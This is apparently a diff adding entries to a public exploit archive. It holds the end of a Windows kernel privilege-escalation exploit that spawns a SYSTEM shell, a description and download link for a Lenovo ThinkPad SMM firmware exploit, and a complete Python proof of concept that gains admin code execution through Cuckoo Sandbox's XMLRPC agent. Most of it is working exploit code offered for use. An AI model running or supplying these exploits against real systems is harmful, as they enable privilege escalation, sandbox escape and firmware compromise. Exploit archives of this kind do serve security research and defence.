_NtQueryIntervalProfile NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandleA("NTDLL.DLL"), "NtQueryIntervalProfile");
ULONG result;
KPROFILE_SOURCE stProfile = ProfileTotalIssues;
NtQueryIntervalProfile(stProfile, &result);
printf("SYSTEM shell comming\n");
Launch();
printf("All done, exiting\n");
return 0;
}

16
platforms/windows/local/40040.txt Executable file
View file

@ -0,0 +1,16 @@
Source: https://github.com/Cr4sh/ThinkPwn
Lenovo ThinkPad System Management Mode arbitrary code execution exploit
***************************************************************************
For more information about this project please read the following article:
http://blog.cr4.sh/2016/06/exploring-and-exploiting-lenovo.html
This code exploits 0day privileges escalation vulnerability (or backdoor?) in SystemSmmRuntimeRt UEFI driver (GUID is 7C79AC8C-5E6C-4E3D-BA6F-C260EE7C172E) of Lenovo firmware. Vulnerability is present in all of the ThinkPad series laptops, the oldest one that I have checked is X220 and the neweset one is T450s (with latest firmware versions available at this moment). Running of arbitrary System Management Mode code allows attacker to disable flash write protection and infect platform firmware, disable Secure Boot, bypass Virtual Secure Mode (Credential Guard, etc.) on Windows 10 Enterprise and do others evil things.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40040.zip

81
platforms/windows/local/40043.py Executable file
View file

@ -0,0 +1,81 @@
# -*- coding: utf8 -*-
"""
# Exploit Title: Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
# Date: June 28th 2016
# Exploit Author: Rémi ROCHER
# Vendor Homepage: https://cuckoosandbox.org/
# Software Link: https://github.com/cuckoosandbox/cuckoo/archive/master.zip
# Version: <= 2.0.1
# Tested on: MS Windows 7, MS Windows 10 (With & without UAC)
# CVE : None
--[ NAME
Cuckoo Sandbox Guest XMLRPC Privileged RCE PoC
--[ DESCRIPTION
Cuckoo Sandbox is Free Software, basically used by researchers to analyze
(potential) malware behavior. It is also implemented industrially by
private companies for detecting potential threats within IT Networks
featuring dedicated so-called security appliances.
This basic Proof of Concept exploit is spawning a calc.exe process with
Administrator privileges, assuming:
* The Cuckoo agent.py is running with Admin privileges (should be
the case)
* The current user can access a local interface (should be the case)
* Optional for true Remote Code Execution: External equipment can
access the XMLRPC port (default 8000).
One may also call the complete() method in order to stop any further
detection
or screenshot.
Such vulnerabilities can be used to either trick the very detection
system, or
potentially escape the sandbox machine itself. An attacker could also
exploit
such bugs as a pivot in order to attack sensitive systems.
--[ AUTHORS
* Rémi ROCHER - Armature Technologies
* Thomas MARTHÉLY- Armature Technologies
--[ RESOURCE
* Repository: https://github.com/cuckoosandbox/cuckoo
"""
import xmlrpclib
from StringIO import StringIO
from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED
def execute(x, cmd="cmd /c start"):
output = StringIO()
file = ZipFile(output, "w", ZIP_STORED)
info = ZipInfo("analyzer.py")
info.compress_type = ZIP_DEFLATED
content = ("""
import subprocess
if __name__ == "__main__":
subprocess.Popen("%s",stdout=subprocess.PIPE,stderr=subprocess.PIPE)
""" % cmd)
file.writestr(info, content)
file.close()
data = xmlrpclib.Binary(output.getvalue())
if x.add_analyzer(data):
return x.execute()
if __name__ == "__main__":
x = xmlrpclib.ServerProxy("http://localhost:8000")
execute(x, "calc.exe")
# x.complete() # Blackout mode